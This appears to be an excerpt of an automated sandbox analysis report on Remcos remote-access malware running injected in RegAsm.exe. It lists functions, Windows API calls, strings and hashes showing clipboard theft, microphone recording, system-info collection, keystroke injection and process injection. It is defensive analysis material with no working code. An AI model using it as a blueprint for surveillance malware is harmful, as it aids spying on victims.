                                • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                • Opcode Fuzzy Hash: 1596478972ce96747ca32779f183717890ad831c566256f19ff3d4655c30f502
                                • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                • String ID: 0VG$0VG$<$@$Temp
                                • API String ID: 1704390241-2575729100
                                • Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                                • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                • Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                                • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 00416941
                                • EmptyClipboard.USER32 ref: 0041694F
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32 ref: 0041696C
                                • GlobalLock.KERNEL32 ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID: !D@
                                • API String ID: 2172192267-604454484
                                • Opcode ID: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                                • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                • Opcode Fuzzy Hash: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                                • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                • CloseHandle.KERNEL32(?), ref: 00413465
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                • String ID:
                                • API String ID: 297527592-0
                                • Opcode ID: c8607eadb7f648cd119cf038169f51a0334e47929f95f9aa533bbd49f0d75183
                                • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                • Opcode Fuzzy Hash: c8607eadb7f648cd119cf038169f51a0334e47929f95f9aa533bbd49f0d75183
                                • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00448135
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00448141
                                • _free.LIBCMT ref: 0044814C
                                • _free.LIBCMT ref: 00448157
                                • _free.LIBCMT ref: 00448162
                                • _free.LIBCMT ref: 0044816D
                                • _free.LIBCMT ref: 00448178
                                • _free.LIBCMT ref: 00448183
                                • _free.LIBCMT ref: 0044818E
                                • _free.LIBCMT ref: 0044819C
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DecodePointer
                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                • API String ID: 3527080286-3064271455
                                • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                • Sleep.KERNEL32(00000064), ref: 00417521
                                • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
                                • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                • Opcode Fuzzy Hash: 80bc1f01d41e6bb49ab2ea0752573067485f1394140a330d823018e0c212e60a
                                • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CurrentProcess
                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                • API String ID: 2050909247-4242073005
                                • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • _strftime.LIBCMT ref: 00401D50
                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                • API String ID: 3809562944-243156785
                                • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                • int.LIBCPMT ref: 00410E81
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                • String ID: ,kG$0kG
                                • API String ID: 3815856325-2015055088
                                • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                • waveInStart.WINMM ref: 00401CFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID: dMG$|MG$PG
                                • API String ID: 1356121797-532278878
                                • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                  • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                                  • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                                  • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                • TranslateMessage.USER32(?), ref: 0041D4E9
                                • DispatchMessageA.USER32 ref: 0041D4F3
                                • GetMessageA.USER32 ref: 0041D500
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • _memcmp.LIBVCRUNTIME ref: 00445423
                                • _free.LIBCMT ref: 00445494
                                • _free.LIBCMT ref: 004454AD
                                • _free.LIBCMT ref: 004454DF
                                • _free.LIBCMT ref: 004454E8
                                • _free.LIBCMT ref: 004454F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                • ExitThread.KERNEL32 ref: 004018F6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: PkG$XMG$NG$NG
                                • API String ID: 1649129571-3151166067
                                • Opcode ID: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                • Opcode Fuzzy Hash: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                                • MoveFileW.KERNEL32 ref: 00407A6A
                                • CloseHandle.KERNEL32(00000000), ref: 00407A95
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                • String ID: .part
                                • API String ID: 1303771098-3499674018
                                • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                                • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm$zD
                                • API String ID: 2936374016-2723203690
                                • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]$xUG$TG
                                • API String ID: 3554306468-1165877943
                                • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetConsoleCP.KERNEL32 ref: 0044B3FE
                                • __fassign.LIBCMT ref: 0044B479
                                • __fassign.LIBCMT ref: 0044B494
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                                • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
